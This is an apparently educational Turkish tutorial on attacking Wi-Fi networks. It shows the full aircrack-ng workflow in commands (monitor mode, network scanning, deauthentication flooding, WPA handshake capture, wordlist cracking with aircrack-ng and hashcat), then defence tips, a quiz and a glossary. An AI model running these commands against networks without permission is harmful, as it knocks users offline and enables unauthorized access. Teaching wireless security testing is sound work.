⚠️ ETİK UYARI: Bu bilgiler sadece eğitim amaçlıdır. İzniniz olmayan ağlara saldırmak yasadışıdır!
1. Monitor Moduna Geçiş
Monitor modu, kablosuz kartınızın havadaki tüm paketleri dinlemesini sağlar.
Adım 1: Kablosuz Arayüzü Bulma
ifconfig
# veya
ip a
# Genellikle wlan0 olarak görünürAdım 2: Monitor Modunu Açma
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
# Veya airmon-ng ile
sudo airmon-ng start wlan0Adım 3: Kontrol
iwconfig
# Mode: Monitor yazmalı2. Aircrack-ng Suite
Wi-Fi güvenlik testleri için en popüler araç paketidir.
Çevredeki Ağları Tarama
sudo airodump-ng wlan0
# Çıktı:
# BSSID (MAC), PWR (Güç), CH (Kanal), ESSID (Ağ Adı)Belirli Bir Ağı İzleme
sudo airodump-ng -c 6 -w capture --bssid AA:BB:CC:DD:EE:FF wlan0
# -c 6: Kanal 6
# -w capture: Çıktı dosyası
# --bssid: Hedef ağın MAC adresi3. Deauthentication (Deauth) Attack
Hedefteki kullanıcıyı ağdan düşürme saldırısı. WPA handshake yakalamak için kullanılır.
# Yeni terminal aç
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0
# --deauth 10: 10 deauth paketi gönder
# -a: Access Point MAC adresi (BSSID)
# Belirli bir cihaza deauth
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0
# -c: İstemci (client) MAC adresi4. WPA Handshake Yakalama
Kullanıcı ağa tekrar bağlanırken 4-way handshake yakalanır.
# 1. Terminal: Ağı izle
sudo airodump-ng -c 6 -w wpa_capture --bssid AA:BB:CC:DD:EE:FF wlan0
# 2. Terminal: Deauth gönder
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0
# Ekranda "WPA handshake: AA:BB:CC:DD:EE:FF" görünürse başarılı!5. Şifre Kırma
Aircrack-ng ile
# Wordlist ile şifre kırma
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa_capture-01.cap
# -w: Wordlist dosyası
# .cap: Yakalanan handshake dosyasıHashcat ile (Daha Hızlı)
# .cap dosyasını .hccapx'e dönüştür
aircrack-ng -J output wpa_capture-01.cap
# Hashcat ile kır
hashcat -m 2500 output.hccapx /usr/share/wordlists/rockyou.txt6. Pratik Senaryo: Tam Süreç
# 1. Monitor mod
sudo airmon-ng start wlan0
# 2. Ağları tara
sudo airodump-ng wlan0mon
# 3. Hedef ağı izle (yeni terminal)
sudo airodump-ng -c 6 -w capture --bssid AA:BB:CC:DD:EE:FF wlan0mon
# 4. Deauth gönder (yeni terminal)
sudo aireplay-ng --deauth 20 -a AA:BB:CC:DD:EE:FF wlan0mon
# 5. Handshake yakalandı mı kontrol et
# İzleme terminalinde "WPA handshake" yazısını bekle
# 6. Şifre kır
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# 7. Monitor modu kapat
sudo airmon-ng stop wlan0mon7. Korunma Yöntemleri
- Güçlü Şifre: En az 12 karakter, karışık
- WPA3: Mümkünse WPA3 kullan
- MAC Filtreleme: Ekstra koruma katmanı
- SSID Gizleme: Ağ adını gizle (zayıf koruma)
- Misafir Ağı: Ana ağı ayır
Soru 1: Monitor modu ne işe yarar?
Soru 2: Monitor modu açmak için hangi komut kullanılır?
Soru 3: Çevredeki Wi-Fi ağlarını taramak için hangi komut kullanılır?
Soru 4: Deauth attack ne işe yarar?
Soru 5: Deauth attack göndermek için hangi komut kullanılır?
Soru 6: WPA handshake ne zaman yakalanır?
Soru 7: Yakalanan handshake ile şifre kırmak için hangi araç kullanılır?
Soru 8: BSSID nedir?
Soru 9: En güvenli Wi-Fi şifreleme protokolü hangisidir?
Soru 10: Wordlist ile şifre kırma hangi saldırı türüdür?
Monitor Mode
Wi-Fi kartının havadaki tüm paketleri dinleme modu
airmon-ng
Monitor modu açıp kapatmak için kullanılır
airodump-ng
Wi-Fi ağlarını tarar ve paketleri yakalar
aireplay-ng
Deauth attack ve paket enjeksiyonu yapar
aircrack-ng
Yakalanan handshake'i kullanarak şifre kırar
Deauth Attack
Kullanıcıyı ağdan düşürerek handshake yakalar
WPA Handshake
Kullanıcı bağlanırken oluşan 4-way authentication
BSSID
Access Point'in MAC adresi
Wordlist
Dictionary attack için kullanılan şifre listesi
WPA3
En güvenli Wi-Fi şifreleme protokolü